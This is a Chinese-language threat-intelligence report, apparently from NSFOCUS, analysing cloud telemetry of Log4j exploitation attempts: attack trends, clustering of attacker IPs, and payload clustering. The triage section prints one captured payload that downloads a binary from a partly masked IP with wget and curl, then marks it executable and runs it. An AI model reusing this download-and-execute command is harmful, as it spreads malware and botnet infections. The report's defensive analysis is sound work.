Log4j事件云端數據分析
Log4j漏洞攻擊影響范圍深遠,為了有效觀測、識別相關漏洞的攻擊情況,綠盟科技通過監測與跟蹤分析云端數據,洞察事件攻擊態勢,挖掘攻擊模式,加速關鍵攻擊事件的定位與研判。以下為基于綠盟云監測進行分析得到的數據,時間截止至2022年1月4日零時。
一、 態勢觀測:Log4j攻擊趨勢
從圖1可以看出,綠盟云端監測到的Log4j攻擊事件在漏洞曝光之初即呈現爆炸式增長的態勢。隨著政策響應、防護策略與攻擊目標、攻擊技戰術的博弈,攻擊事件爆發初期出現波動但持續增長,于12月19日達到攻擊頂峰,隨后呈現整體下降的態勢。從攻擊源的地理位置分布來看,前期以國內攻擊源為主,12月14日后,國外攻擊源大幅增加,并在后續時間段內保持與國內攻擊源一致的攻擊規模和攻擊數量趨勢。
圖1 Log4j攻擊事件國內外攻擊源數量趨勢
此外,在綠盟云端的監測節點中,檢測到Log4j攻擊的設備占比在第一周快速升高,并在第二周后趨于平穩。截至2022年1月4日,已累計有近17%的防護站點監測到該類型攻擊。
圖2 檢測到Log4j攻擊的云端節點數量趨勢
二、 團伙行為觀測
云端監控的優勢在于能夠通過全局視角觀測攻擊者、攻擊團伙的跨域攻擊行為,以及整體的行為模式演化。圖3給出了采樣數據中,部署在不同位置監測設備(紫色節點)監控下的攻擊者(源IP)關聯關系。可以看出有較為明顯的團簇現象。一方面,少量受害者站點受到了大規模攻擊源的集中攻擊;另一方面,攻擊團伙利用大規模攻擊基礎設施,對指定的受害者群體發起了大規模的掃描與攻擊行為。
圖3 Log4j攻擊事件跨域行為
三、 事件精細分診
為了細粒度觀測Log4j攻擊事件的攻擊手法,實現在大規模事件下的事件準確研判,綠盟科技基于數據分析方法,對事件進行細粒度分診。首先,通過已知指紋特征過濾提取已知攻擊行為模式,進而對事件載荷進行采樣、清洗、向量化、降維,并實現聚類分析,對所有事件進行模式壓縮。
圖4 Log4j攻擊載荷聚類可視化
通過降維聚類,可以對大部分同質攻擊載荷進行壓縮,整體壓縮率可達95%。聚類將全部事件分為幾十種不同類別,圖5分別列出了所有事件中占比最高的幾個攻擊模式類別。
圖5 Log4j Top5攻擊模式類別趨勢
對事件采樣并進行整體分診,剔除掉一些典型的掃描事件類簇,對不同統計模式的事件進行數量統計和標準化,各個聚類簇和關鍵字命中類別的每日攻擊數量趨勢如圖7所示。可以看到,具有明顯特征的大規模攻擊者及其攻擊行為(載荷層次)隨著時間推進而變化。例如,某些利用公共基礎設施的(如keyword1部分,awv********.cn公共dnslog平臺)攻擊利用行為在2021年12月12日后大幅減少,近期有所反彈。此外,如包含攻擊載荷的cluster3攻擊行為集中出現,其攻擊載荷為:
wget http://152.*.*.150/py; curl -O http://152.*.*.150/py; chmod 777 py; ./py rce.x86
圖6的峰值幅度對各個類別的數據自身規模進行歸一化,以更好的展示每一類攻擊載荷在長時間周期內的攻擊強度分布。可以看出整體上隨著時間的推進,綠盟云檢測到的攻擊載荷模式隨之演變。有些攻擊樣本及載荷,在整個時間周期內有持續性;大部分攻擊載荷模式,在不同的時間段出現,說明有不同攻擊手法、攻擊意圖的攻擊者涌現和消逝。
圖6 Log4j Top5攻擊模式類別趨勢
通過對上述數據的快速分診分析,我們發現絕大多數攻擊事件為漏洞掃描行為。除此之外,也定位到大量有實際漏洞利用動作的攻擊載荷,涉及下載挖礦腳本、mirai僵尸網絡傳播等類型。一些典型的攻擊載荷如圖7所示。
圖7 Log4j攻擊載荷摘要
四、 安全知識圖譜
如圖8所示,從安全知識圖譜的分析中可以發現,圖譜中已涵蓋log4j的最新漏洞測試POCs,或利用腳本(Exploit-DB)和依賴log4j的組件或產品,以及國內外漏洞通告情況、緩解方案、漏洞可能關聯的潛在攻擊模式等。安全知識圖譜基于圖關聯統計分析log4j影響范圍和風險面狀況,同時產出log4j的關聯知識,自動生成檢測規則并應用在安全掃描器或資產掃描中,進一步深度安全自查,有效緩解企業安全風險管理問題。
圖8 從安全知識圖譜中分析Log4j風險
五、總結
在云端大數據平臺上,我們能夠觀測攻擊事件的整體態勢和攻擊行為關聯行為模式,并以系統、全局的視角審視攻擊團伙行為,分析攻擊模式演變。基于云端知識圖譜與智能分診技術,能夠加速攻擊技戰術的研判,并生成高置信度的威脅情報,支撐高級威脅的精準和快速定位。
相關推薦:
點擊“閱讀原文”下載綠盟科技安全知識圖譜技術白皮書
